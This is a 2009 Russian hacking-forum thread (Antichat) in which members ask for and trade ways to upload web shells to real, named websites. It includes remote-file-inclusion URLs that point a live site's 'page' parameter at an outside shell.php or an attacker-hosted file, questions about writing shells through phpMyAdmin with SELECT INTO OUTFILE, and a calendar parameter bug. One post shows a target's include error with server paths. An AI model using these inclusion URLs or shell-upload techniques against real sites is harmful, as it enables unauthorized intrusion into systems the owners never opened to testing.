HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.05.2009, 16:10
AET
Новичок
Регистрация: 17.03.2008
Сообщений: 23
С нами: 9553576

Репутация: -2
По умолчанию

здесь прочитал что шель можно залить и так http://wow.alania.net/?page=http://site.ru/shell.php если да то как его запустить если можете какую шель посаветуете если можно еще сылку на шели
 
Ответить с цитированием

  #2  
Старый 06.05.2009, 16:20
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Аааа, если так, то шелл отобразится по этом же адресу, то есть ты инклудишь свой шелл, на эту же страницу (http://wow.alania.net/?page=)

Пример:
Код:
http://www.jiznicechy.org/en/index.php?path=http://forum.antichat.ru

Последний раз редактировалось -m0rgan-; 06.05.2009 в 16:39..
 
Ответить с цитированием

  #3  
Старый 06.05.2009, 20:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

-m0rgan-, плохой пример. Тут не инклюд, а фрейм.
 
Ответить с цитированием

  #4  
Старый 06.05.2009, 21:54
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами: 9318329

Репутация: 394
По умолчанию

В общем у меня вопрос следующего рода:
есть сайт и есть доступ к phpmyadmin-у а когда пытаюсь залить шелл с помощью конструкции select into outfile выдает такой ответ #1045 - Access denied for user… собственно вопрос – что это значит? это типа у юзера не хватает прав или что? И что с этим можно сделать? И может, есть какой то другой способ залить шелл через phpmyadmin-а???
 
Ответить с цитированием

  #5  
Старый 06.05.2009, 22:34
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

>>что это значит?
Да, у юзера нет прав.

>>что с этим можно сделать
Зайти под юзером у которого есть права

>>может, есть какой то другой способ залить шелл через phpmyadmin-а
Если нет прав на запись, то нет

Add:
Есть ещё уязвимости самого пыхадмина:
https://forum.antichat.ru/thread50669.html
Возможно тебе повезёт

Последний раз редактировалось jokester; 06.05.2009 в 22:46..
 
Ответить с цитированием

  #6  
Старый 06.05.2009, 23:14
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами: 9318329

Репутация: 394
По умолчанию

Цитата:
Сообщение от jokester  
Add:
Есть ещё уязвимости самого пыхадмина:
https://forum.antichat.ru/thread50669.html
Возможно тебе повезёт
сенкс!
 
Ответить с цитированием

  #7  
Старый 06.05.2009, 23:52
Serge24
Banned
Регистрация: 06.05.2009
Сообщений: 13
С нами: 8955746

Репутация: -2
По умолчанию

Как это можно использовать?
/index.php?act=calendar&code=birthdays&y=2009&m=5&d =4
# user12 (19)
# user45 (21)
# user545 (17)
# user74 (22)
/index.php?act=calendar&code=birthdays&y[]=2009&m=5&d=4
# user587 (-1989)
# user577 (-1987)
# user5774 (-1991)
# user5546 (-1986)
 
Ответить с цитированием

  #8  
Старый 07.05.2009, 00:04
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию

Поскажите как пользоваться?

http://wow.alania.net/?page=


Warning: include(./inc/.php) [function.include]: failed to open stream: No such file or directory in Y:\home\78.110.144.12\www\index.php on line 104

Warning: include() [function.include]: Failed opening './inc/.php' for inclusion (include_path='.;/usr/local/php5/PEAR') in Y:\home\78.110.144.12\www\index.php on line 104
 
Ответить с цитированием

  #9  
Старый 07.05.2009, 00:11
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

как-как, молча:

http://forum.antichat.ru/thread12123.html
 
Ответить с цитированием

  #10  
Старый 07.05.2009, 00:39
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
С нами: 9326973

Репутация: -25
По умолчанию

Почему не сробатывает???

http://wow.alania.net/?page=http://gef48.narod.ru/antichat
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.